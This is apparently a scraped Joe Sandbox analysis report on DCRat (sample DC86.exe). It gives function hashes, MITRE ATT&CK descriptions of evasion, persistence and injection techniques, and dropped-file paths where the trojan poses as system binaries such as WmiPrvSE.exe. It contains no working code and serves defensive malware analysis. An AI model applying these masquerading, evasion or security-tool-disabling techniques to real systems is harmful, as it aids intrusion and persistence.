Opcode ID: acb66887ac7acf1cbabf8516ecc65d566a4e1d5ecbd78d335c7d9c80776ef701
Instruction ID: 53920d1cebbc6c33c5c43be6287c48a8e7917c0bdc58a57c25728f8550aed0a6
Opcode Fuzzy Hash: acb66887ac7acf1cbabf8516ecc65d566a4e1d5ecbd78d335c7d9c80776ef701
Instruction Fuzzy Hash: BCD01210F0896A47E7446B3480B61FE12819F46310F0404F5EE0EC73C3DC2CAC412AC1

Function 00007FFD346563CD Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2477558375.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd34650000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1b30bf881a0767a697b065a0ce7ce9f2120f0eafc9a2745555433cc68a000c
Instruction ID: a1067f655bc40af740535fe1ebc7777a7033b48067f8d23c0621b65a4ab97a29
Opcode Fuzzy Hash: ff1b30bf881a0767a697b065a0ce7ce9f2120f0eafc9a2745555433cc68a000c
Instruction Fuzzy Hash: 14C08C01F08A2A07F229230840303BD04024F40718F480078E00EDA2CACC0C1D0102C7

Function 00007FFD346506D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2477558375.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd34650000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction ID: 1c53a4dbbb7211218cc0e74d5833118a1f1972cec117222c83cb1b785aa06964
Opcode Fuzzy Hash: 8cf5d805de2e92f06ac4483289a5bcde691937bd6aba2715eae8f79235abd674
Instruction Fuzzy Hash: A0B01204D6A85F00A818357B08D20F470505F46108FC411F0D70CC0189984D10D42242

Function 00007FFD34652D4D Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.2477558375.00007FFD34650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34650000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ffd34650000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction ID: 6afb75c1272adaa084e9989884dfc2439edef56d3a7e1833fea062800bc243e6
Opcode Fuzzy Hash: 515a6cd714bd976d405485ff4e7ad3fb53cd6eee25e6f010978a9d58f1f76b16
Instruction Fuzzy Hash:

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DC86.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Microsoft Office\Office16\9292bed4859cea

C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Program Files (x86)\Mozilla Maintenance Service\logs\24dbde2999530e

C:\Program Files (x86)\Mozilla Maintenance Service\logs\WmiPrvSE.exe

C:\Program Files (x86)\Windows Defender\en-GB\9292bed4859cea

C:\Program Files (x86)\Windows Defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe

C:\Recovery\9292bed4859cea

C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe

C:\Users\user\9292bed4859cea

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PuhmblZdAcSNmlRDfzjrgW.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperProviderbrokermonitorNet.exe.log

Windows Analysis Report
DC86.exe

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre